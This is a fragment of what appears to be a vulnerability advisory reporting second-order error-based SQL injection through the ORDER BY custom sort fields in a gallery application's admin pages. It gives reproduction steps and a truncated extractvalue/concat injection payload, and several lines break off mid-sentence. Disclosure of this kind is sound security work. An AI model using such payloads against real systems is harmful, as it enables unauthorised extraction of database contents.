There are multiple second order error based SQL injections into the
ORDER BY keyword in the admin area.
- visit zp-core/admin-options.php?saved&tab=gallery
alternatively visit zp-core/admin-options.php?saved&tab=image
- Set "Sort gallery by" to "Custom"
- set custom fields to "id,extractvalue(0x0a,concat(0x0a,(select
- visit zp-core/admin-upload.php?page=upload&tab=http&type=images
- alternatively, visiting either of these will also trigger the injection:
The result is only directly displayed if the server is configured to
report errors, but it can also be seen in the logfile located at